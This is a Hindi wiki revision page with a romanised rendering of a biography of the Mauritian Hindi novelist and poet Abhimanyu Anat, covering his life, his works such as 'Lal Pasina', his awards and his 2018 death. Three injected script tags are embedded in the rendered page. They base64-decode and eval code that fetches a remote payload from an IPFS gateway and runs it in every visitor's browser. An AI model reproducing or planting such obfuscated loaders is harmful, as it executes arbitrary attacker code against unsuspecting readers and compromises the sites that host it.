Difference between revisions of "अभिमन्यु अनत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "वरन " to "वरन् ")
 
(3 intermediate revisions by 2 users not shown)
Line 6: Line 6:
 
|जन्म=[[9 अगस्त]], [[1937]]
 
|जन्म=[[9 अगस्त]], [[1937]]
 
|जन्म भूमि=[[मॉरीशस]]
 
|जन्म भूमि=[[मॉरीशस]]
|मृत्यु=
+
|मृत्यु=[[4 जून]], [[2018]]
 
|मृत्यु स्थान=
 
|मृत्यु स्थान=
 
|अभिभावक=
 
|अभिभावक=
Line 20: Line 20:
 
|शिक्षा=
 
|शिक्षा=
 
|पुरस्कार-उपाधि=
 
|पुरस्कार-उपाधि=
|प्रसिद्धि=हिन्दी कथा साहित्यकार
+
|प्रसिद्धि=[[हिन्दी]] [[कथा]] [[साहित्यकार]]
 
|विशेष योगदान=
 
|विशेष योगदान=
 
|नागरिकता=
 
|नागरिकता=
Line 32: Line 32:
 
|अद्यतन=
 
|अद्यतन=
 
}}
 
}}
 
+
'''अभिमन्यु अनत''' ([[अंग्रेज़ी]]: ''Abhimanyu Anat'', जन्म- [[9 अगस्त]], [[1937]], [[मॉरीशस]]; मृत्यु- [[4 जून]], [[2018]]) [[मॉरीशस]] में [[हिन्दी]] [[कथा साहित्य]] के सम्राट हैं। उन्होंने 18 वर्षों से हिन्दी का अध्यापन किया और तीन वर्षों तक युवा मंत्रालय में 'नाट्य कला विभाग' में नाट्य प्रशिक्षक रहे। उन्होंने अपने उच्च-स्तरीय हिन्दी [[उपन्यास|उपन्यासों]] और [[कहानी|कहानियों]] के द्वारा मॉरीशस को [[हिन्दी साहित्य]] में उच्च मंच पर प्रतिष्ठित किया।
'''अभिमन्यु अनत''' ([[अंग्रेज़ी]]: ''Abhimanyu Anat'' , जन्म- [[9 अगस्त]], [[1937]]) [[मॉरीशस]] में [[हिन्दी]] कथा-साहित्य के सम्राट हैं। उन्होंने 18 वर्षों से हिन्दी का अध्यापन किया और तीन वर्षों तक युवा मंत्रालय में 'नाट्य कला विभाग' में नाट्य प्रशिक्षक रहे। उन्होंने अपने उच्च-स्तरीय हिन्दी [[उपन्यास|उपन्यासों]] और [[कहानी|कहानियों]] के द्वारा मॉरीशस को हिन्दी साहित्य में उच्च मंच पर प्रतिष्ठित किया।
 
{{tocright}}
 
 
==परिचय==
 
==परिचय==
 
अभिमन्यु अनत का जन्म 9 अगस्त, 1937 ई. को त्रिओले, मॉरीशस में हुआ था। [[मॉरीशस]] निवासी और वहीं पर पले-बढ़े अभिमन्यु अनत ने [[हिन्दी साहित्य]] की श्रीवृद्धि में जो सहयोग किया है, वह प्रशंसनीय है। अभिमन्यु का मूल [[भारत]] की ही [[मिट्टी]] है। इनके पूर्वज अन्य भारतीयों के साथ [[अंग्रेज़|अंग्रेज़ों]] द्वारा वहाँ [[गन्ना|गन्ने]] की खेती में श्रम करने के लिए लाये गए थे। मज़दूरों के रूप में गये भारतीय अनत: वहीं पर बस गए। मॉरीशस काल-क्रम से अंग्रज़ों के शासन से मुक्त हुआ। भारतीय जो श्रमिक बनकर वहाँ गए थे, उनकी दूसरी-तीसरी पीढ़ियाँ पढ़ी-लिखी और सम्पन्न हैं। उनका जीवन स्तर बहुत ऊँचा है। अभिमन्यु की भारतीय पृष्ठभूमि ने उन्हें [[हिन्दी]] की सेवा के लिए उत्साहित किया और उन्होंने अपने पूर्वजों की मातृभूमि का ऋण अच्छी तरह से चुकाया। मॉरीशस के महान् कथा-शिल्पी अभिमन्यु अनत ने हिन्दी [[कविता]] को एक नया आयाम दिया है। उनकी कविताओं का भारत के हिन्दी साहित्य में भी महत्त्वपूर्ण स्थान है।
 
अभिमन्यु अनत का जन्म 9 अगस्त, 1937 ई. को त्रिओले, मॉरीशस में हुआ था। [[मॉरीशस]] निवासी और वहीं पर पले-बढ़े अभिमन्यु अनत ने [[हिन्दी साहित्य]] की श्रीवृद्धि में जो सहयोग किया है, वह प्रशंसनीय है। अभिमन्यु का मूल [[भारत]] की ही [[मिट्टी]] है। इनके पूर्वज अन्य भारतीयों के साथ [[अंग्रेज़|अंग्रेज़ों]] द्वारा वहाँ [[गन्ना|गन्ने]] की खेती में श्रम करने के लिए लाये गए थे। मज़दूरों के रूप में गये भारतीय अनत: वहीं पर बस गए। मॉरीशस काल-क्रम से अंग्रज़ों के शासन से मुक्त हुआ। भारतीय जो श्रमिक बनकर वहाँ गए थे, उनकी दूसरी-तीसरी पीढ़ियाँ पढ़ी-लिखी और सम्पन्न हैं। उनका जीवन स्तर बहुत ऊँचा है। अभिमन्यु की भारतीय पृष्ठभूमि ने उन्हें [[हिन्दी]] की सेवा के लिए उत्साहित किया और उन्होंने अपने पूर्वजों की मातृभूमि का ऋण अच्छी तरह से चुकाया। मॉरीशस के महान् कथा-शिल्पी अभिमन्यु अनत ने हिन्दी [[कविता]] को एक नया आयाम दिया है। उनकी कविताओं का भारत के हिन्दी साहित्य में भी महत्त्वपूर्ण स्थान है।
Line 46: Line 44:
 
[[अंग्रेजी भाषा]] को प्राथमिकता देने के पीछे दिखावा प्रवृत्ति को मुख्य कारण मानने वाले अभिमन्यु अनत के साथ लगभग पच्चीस सालों से संपर्क में रहने वाले साहित्यकार [[अशोक चक्रधर]] उन्हें हिन्दी साहित्य की महानिधि मानते हैं। साहित्य की विभिन्न विधाओं में 60 से अधिक पुस्तकों के रचयिता श्री अनत का [[उपन्यास]] 'लाल पसीना' कालजयी कृति के रूप में विख्यात हो चुका है।  
 
[[अंग्रेजी भाषा]] को प्राथमिकता देने के पीछे दिखावा प्रवृत्ति को मुख्य कारण मानने वाले अभिमन्यु अनत के साथ लगभग पच्चीस सालों से संपर्क में रहने वाले साहित्यकार [[अशोक चक्रधर]] उन्हें हिन्दी साहित्य की महानिधि मानते हैं। साहित्य की विभिन्न विधाओं में 60 से अधिक पुस्तकों के रचयिता श्री अनत का [[उपन्यास]] 'लाल पसीना' कालजयी कृति के रूप में विख्यात हो चुका है।  
 
==मॉरीशस के उपन्यास सम्राट==
 
==मॉरीशस के उपन्यास सम्राट==
उपन्यास के क्षेत्र में अभिमन्यु अनत 'मॉरीशस के उपन्यास सम्राट" है। उनके अभी तक 29 उपन्यास छप चुके हैं। पहला उपन्यास 'और नदी बहती रही' सन [[1970]] में छपा था तथा उनका नवीनतम उपन्यास 'अपना मन उपवन' अभी इसी वर्ष में प्रकाशित हुआ है। उनका प्रसिद्ध उपन्यास 'लाल पसीना' सन [[1977]] में छपा था, जो [[भारत]] से गये गिरमिटिया मज़दूरों की मार्मिक [[कहानी]] है। अब इसका अनुवाद 'फ्रेंच भाषा' में हो चुका है। इस उपन्यास की दो अन्य कड़ियाँ भी प्रकाशित हुई, जिनके शीर्षक हैं- 'गांधीजी बोले थे' ([[1984]]) तथा 'और पसीना बहता रहा' ([[1993]])। भारत से बाहर हिन्दी में इस त्रिखंडी उपन्यास को लिखने वाले वे एकमात्र उपन्यासकार हैं, जिनमें भारतीय मज़दूरों की महाकाव्यात्मक गाथा का जीवन्त वर्णन हुआ है।
+
उपन्यास के क्षेत्र में अभिमन्यु अनत 'मॉरीशस के उपन्यास सम्राट" है। उनके अभी तक 29 उपन्यास छप चुके हैं। पहला उपन्यास 'और नदी बहती रही' सन [[1970]] में छपा था तथा उनका नवीनतम उपन्यास 'अपना मन उपवन' अभी इसी वर्ष में प्रकाशित हुआ है। उनका प्रसिद्ध उपन्यास 'लाल पसीना' सन [[1977]] में छपा था, जो [[भारत]] से गये गिरमिटिया मज़दूरों की मार्मिक [[कहानी]] है। अब इसका अनुवाद 'फ्रेंच भाषा' में हो चुका है। इस उपन्यास की दो अन्य कड़ियाँ भी प्रकाशित हुई, जिनके शीर्षक हैं- 'गांधीजी बोले थे' ([[1984]]) तथा 'और पसीना बहता रहा' ([[1993]])। [[भारत]] से बाहर हिन्दी में इस त्रिखंडी उपन्यास को लिखने वाले वे एकमात्र उपन्यासकार हैं, जिनमें भारतीय मज़दूरों की महाकाव्यात्मक गाथा का जीवन्त वर्णन हुआ है।
 
====भूमिपुत्र====
 
====भूमिपुत्र====
अभिमन्यु अनत अपने देश के भूमिपुत्र हैं तथा अनी जातीय परम्परा के राष्ट्रीय उपन्यासकार हैं। मॉरीशस की भूमि, वहां की संस्कृति, वहां के अंचल, वहां की सन्तानें सभी उनकी लेखकीय आत्मा के अंग हैं। वे अपने देश के वर्तमान की त्रासदियों, क्रियाकलापों, औपनिवेशिक दबाव और विसंस्कृतिकरण की दुष्प्रवृत्तियों का बड़ी यथार्थता के साथ उद्घाटन करते हैं तथा जीवन मूल्यों तथा आदर्शवाद को साथ लेकर चलते हैं।<ref> {{cite web |url=http://evishwa.com/articledetail.php?ArticleId=22&CategoryId=0|title=हिन्दी का प्रवासी साहित्य|accessmonthday=10 जुलाई|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>   
+
अभिमन्यु अनत अपने देश के भूमिपुत्र हैं तथा अनी जातीय परम्परा के राष्ट्रीय [[उपन्यासकार]] हैं। मॉरीशस की भूमि, वहां की संस्कृति, वहां के अंचल, वहां की सन्तानें सभी उनकी लेखकीय आत्मा के अंग हैं। वे अपने देश के वर्तमान की त्रासदियों, क्रियाकलापों, औपनिवेशिक दबाव और विसंस्कृतिकरण की दुष्प्रवृत्तियों का बड़ी यथार्थता के साथ उद्घाटन करते हैं तथा जीवन मूल्यों तथा आदर्शवाद को साथ लेकर चलते हैं।<ref> {{cite web |url=http://evishwa.com/articledetail.php?ArticleId=22&CategoryId=0|title=हिन्दी का प्रवासी साहित्य|accessmonthday=10 जुलाई|accessyear=2011|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>   
 
==रचनाएँ==
 
==रचनाएँ==
 
अभिमन्यु अनत की [[कविता|कविताओं]] में शोषण, दमन और अत्याचार के ख़िलाफ़ आवाज़ बुलंद की गई है। बेरोज़गारी की समस्या पर भी अनत की दृष्टि गई है। समसामयिक व्यवस्था पर कवि का भावुक हृदय चीत्कार कर उठता है-
 
अभिमन्यु अनत की [[कविता|कविताओं]] में शोषण, दमन और अत्याचार के ख़िलाफ़ आवाज़ बुलंद की गई है। बेरोज़गारी की समस्या पर भी अनत की दृष्टि गई है। समसामयिक व्यवस्था पर कवि का भावुक हृदय चीत्कार कर उठता है-
Line 111: Line 109:
 
==सम्मान==
 
==सम्मान==
 
अभिमन्यु अनत को अनेक महान् पुरस्कारों से सम्मानित किया गया जैसे  [[साहित्य अकादमी]], सोवियत लैंड नेहरु पुरस्कार, मैथिलीशरण गुप्त सम्मान, यशपाल पुरस्कार, जनसंस्कृति सम्मान, उत्तर प्रदेश हिन्दी संस्थान पुरस्कार आदि।
 
अभिमन्यु अनत को अनेक महान् पुरस्कारों से सम्मानित किया गया जैसे  [[साहित्य अकादमी]], सोवियत लैंड नेहरु पुरस्कार, मैथिलीशरण गुप्त सम्मान, यशपाल पुरस्कार, जनसंस्कृति सम्मान, उत्तर प्रदेश हिन्दी संस्थान पुरस्कार आदि।
 +
==निधन==
 +
साहित्यकार अभिमन्यु अनत का [[सोमवार]], [[4 जून]], [[2018]] को निधन हो गया। उनकी आयु 81 [[वर्ष]] थी और वह लंबे समय से अस्वस्थ थे।
 
   
 
   
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 07:06, 9 August 2018

abhimanyu anat
poora nam abhimanyu anat
any nam 'anat' (upanam)
janm 9 agast, 1937
janm bhoomi m aaurishas
mrityu 4 joon, 2018
karm bhoomi m aaurishas
mukhy rachanaean 'kaiktas ke daant', 'nagaphani mean ulajhi saansean', 'gooanga itihas', 'dekh kabira haansi', 'iansan aur mashin', 'jab kal aega yamaraj', 'laharoan ki beti', 'ek bigha pyar', 'kuhase ka dayara' adi.
prasiddhi hindi katha sahityakar
upadhi 'm aaurishas ke upanyas samrat'
any janakari abhimanyu anat ki kavitaoan mean shoshan, daman aur atyachar ke khilaf avaz buland ki gee hai. berozagari ki samasya par bhi inaki drishti gee hai.
inhean bhi dekhean kavi soochi, sahityakar soochi

abhimanyu anat (aangrezi: Abhimanyu Anat, janm- 9 agast, 1937, m aaurishas; mrityu- 4 joon, 2018) m aaurishas mean hindi katha sahity ke samrat haian. unhoanne 18 varshoan se hindi ka adhyapan kiya aur tin varshoan tak yuva mantralay mean 'naty kala vibhag' mean naty prashikshak rahe. unhoanne apane uchch-stariy hindi upanyasoan aur kahaniyoan ke dvara m aaurishas ko hindi sahity mean uchch manch par pratishthit kiya.

parichay

abhimanyu anat ka janm 9 agast, 1937 ee. ko triole, m aaurishas mean hua tha. m aaurishas nivasi aur vahian par pale-badhe abhimanyu anat ne hindi sahity ki shrivriddhi mean jo sahayog kiya hai, vah prashansaniy hai. abhimanyu ka mool bharat ki hi mitti hai. inake poorvaj any bharatiyoan ke sath aangrezoan dvara vahaan ganne ki kheti mean shram karane ke lie laye ge the. mazadooroan ke roop mean gaye bharatiy anat: vahian par bas ge. m aaurishas kal-kram se aangrazoan ke shasan se mukt hua. bharatiy jo shramik banakar vahaan ge the, unaki doosari-tisari pidhiyaan padhi-likhi aur sampann haian. unaka jivan star bahut ooancha hai. abhimanyu ki bharatiy prishthabhoomi ne unhean hindi ki seva ke lie utsahit kiya aur unhoanne apane poorvajoan ki matribhoomi ka rrin achchhi tarah se chukaya. m aaurishas ke mahanh katha-shilpi abhimanyu anat ne hindi kavita ko ek naya ayam diya hai. unaki kavitaoan ka bharat ke hindi sahity mean bhi mahattvapoorn sthan hai.

karyakshetr

atharah varshoan tak hindi ka adhyapan karane ke pashchath tin varshoan tak abhimanyu anat yuva mantralay mean naty prashikshak rahe. m aaurishas ke 'mahatma gaandhi ianstitayoot' mean bhasha prabhari ke pad se sevanivritt hone ke bad in dinoan abhimanyu anat vahian ke 'raviandranath taigor ianstitayoot' ka nideshak pad sanbhal rahe haian. anek rashtriy evan aantararashtriy puraskaroan se sammanit anat ji ke pathakoan ki sankhya bharat mean bhi kam nahian hai. vidrohi lekhak ki chhavi dharan kar unhoanne sadaiv hindi ke prasar ki bat ki.

vyaktitv

shaant, saumy vyaktitv ke dhani abhimanyu anat m aaurishas hi nahian, varanh poore hindi jagath ke shiromani haian. m aaurishas mean unaki chhavi vidrohi lekhak ke roop mean hoti hai. unaki lekhani mean sadaiv amajan ki bhavana mukharit hoti hai. pad ka lalach unhean kabhi baandh nahian paya. apani lekhani ko sashakt banane ke lie kee bar unhoanne pad ko bhi thokar mar di. unake ghar ke pas sthit samudr ka shaant svaroop bhi unake vyaktitv mean samahit ho gaya hai. m aaurishas mean hindi sahity aur abhimanyu ek doosare ke poorak haian.

atuly lekhani

aj kisi bhi bharatiy sahityakar ke sath abhimanyu anat ka tulanatmak adhyayan kar shodh ka praroop diya ja sakata hai. unaki lekhani mean sadaiv m aaurishas ke amajan ki pareshaniyoan ko ukera jata raha hai. unhean kabhi bhi satta ka bhay akraant nahian kar paya. unhoanne kee bar apani lekhani ke madhyam se satta ko chunauti pradan ki. bharat mean hindi sahityakar ke roop mean unaki yogyata ko poori pratishtha nahian milane ka mukhy karan bharatiy hindi sahityakaroan ki akarmanyata hai. sahityakaroan dvara aksar pravasi lekhakoan se parahej kiya jata hai. jabaki vastavikata yah hai ki hindi sahity mean abhimanyu anat ki lekhani atuly hai. bharat ki saanskritik sanpannata m aaurishas ki tulana mean adhik hai, at: bharat mean pratishtha ka apana ek alag mahatv hai. bharat ke hindi sahityakaroan mean pravasi lekhakoan ko protsahan dene ka abhav hai.[1]

hindi sahity ki mahanidhi

aangreji bhasha ko prathamikata dene ke pichhe dikhava pravritti ko mukhy karan manane vale abhimanyu anat ke sath lagabhag pachchis saloan se sanpark mean rahane vale sahityakar ashok chakradhar unhean hindi sahity ki mahanidhi manate haian. sahity ki vibhinn vidhaoan mean 60 se adhik pustakoan ke rachayita shri anat ka upanyas 'lal pasina' kalajayi kriti ke roop mean vikhyat ho chuka hai.

m aaurishas ke upanyas samrat

upanyas ke kshetr mean abhimanyu anat 'm aaurishas ke upanyas samrat" hai. unake abhi tak 29 upanyas chhap chuke haian. pahala upanyas 'aur nadi bahati rahi' san 1970 mean chhapa tha tatha unaka navinatam upanyas 'apana man upavan' abhi isi varsh mean prakashit hua hai. unaka prasiddh upanyas 'lal pasina' san 1977 mean chhapa tha, jo bharat se gaye giramitiya mazadooroan ki marmik kahani hai. ab isaka anuvad 'phreanch bhasha' mean ho chuka hai. is upanyas ki do any k diyaan bhi prakashit huee, jinake shirshak haian- 'gaandhiji bole the' (1984) tatha 'aur pasina bahata raha' (1993). bharat se bahar hindi mean is trikhandi upanyas ko likhane vale ve ekamatr upanyasakar haian, jinamean bharatiy mazadooroan ki mahakavyatmak gatha ka jivant varnan hua hai.

bhoomiputr

abhimanyu anat apane desh ke bhoomiputr haian tatha ani jatiy parampara ke rashtriy upanyasakar haian. m aaurishas ki bhoomi, vahaan ki sanskriti, vahaan ke aanchal, vahaan ki santanean sabhi unaki lekhakiy atma ke aang haian. ve apane desh ke vartaman ki trasadiyoan, kriyakalapoan, aupaniveshik dabav aur visanskritikaran ki dushpravrittiyoan ka b di yatharthata ke sath udghatan karate haian tatha jivan moolyoan tatha adarshavad ko sath lekar chalate haian.[2]

rachanaean

abhimanyu anat ki kavitaoan mean shoshan, daman aur atyachar ke khilaf avaz buland ki gee hai. berozagari ki samasya par bhi anat ki drishti gee hai. samasamayik vyavastha par kavi ka bhavuk hriday chitkar kar uthata hai-

jis din sooraj ko
mazadooroan ki or se gavahi deni thi
us din subah nahian huee
suna gaya ki
malik ke yahaan ki parti mean
sooraj ne zyada pi li thi.

  • anant ki kavitaoan mean m aaurishas ke shramajiviyoan ki vedana ubharati hai. 'lakshmi ka prashn' shirshak kavita mean anat prashnavachak mudra mean kh de ho jate haian-

anapadh lakshmi par itana zaroor poochhati rahi
pasine ki kimat jab itani mahangi hoti hai
to mazadoor use itane saste kyoan bech deta hai.[3]

kavita sankalan
  • ab tak anat ke char kavita sankalan prakashit ho chuke haian-
  1. kaiktas ke daant
  2. nagaphani mean ulajhi saansean
  3. ek dayari bayan
  4. gulamohar khaul utha
  • anat dvara sanpadit kavita sankalan haian :
  1. m aaurishas ki hindi kavita
  2. m aaurishas ke nau hindi kavi
natak -
  1. virodh
  2. tin drishy
  3. gooanga itihas
  4. rok do kanha
  5. dekh kabira haansi
kahani sangrah-
  1. ek thali samandar
  2. khamoshi ke chitkar
  3. iansan aur mashin
  4. vah bich ka adami
  5. jab kal aega yamaraj
  • inake chhote-b de upanyasoan ki sankhya paiantis hai. kuchh prasiddh nam niche die ja rahe haian-
  1. laharoan ki beti
  2. mark tven ka svarg
  3. phaisala apaka
  4. mu diya paha d bol utha
  5. aur nadi bahati rahi
  6. andolan
  7. ek bigha pyar
  8. jam gaya sooraj
  9. tisare kinare par
  10. chautha prani
  11. lal pasina
  12. tapati dopahari
  13. kuhase ka dayara
  14. shephali
  15. h datal kab hogi
  16. chun-chun chunav
  17. apani hi talash
  18. par pagadandi marati nahian
  19. apani-apani sima
  20. gaandhiji bole the
  21. shabd bhang
  22. pasina bahata
  23. asamap apana aangan
  24. asti-astu
  25. ham pravasi
  • inake upanyasoan mean sarvashreshth hai 'lal pasina', jise mahakavyatmak upanyas mana jata hai.

samman

abhimanyu anat ko anek mahanh puraskaroan se sammanit kiya gaya jaise sahity akadami, soviyat laiand neharu puraskar, maithilisharan gupt samman, yashapal puraskar, janasanskriti samman, uttar pradesh hindi sansthan puraskar adi.

nidhan

sahityakar abhimanyu anat ka somavar, 4 joon, 2018 ko nidhan ho gaya. unaki ayu 81 varsh thi aur vah lanbe samay se asvasth the.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script> <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hindi sahity ke sashakt hastakshar abhimanyu anat (hindi). . abhigaman tithi: 10 julaee, 2011.
  2. hindi ka pravasi sahity (hindi). . abhigaman tithi: 10 julaee, 2011.
  3. m aaurishas mean hindi ki sau sal purani paranpara (hindi). . abhigaman tithi: 10 julaee, 2011.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>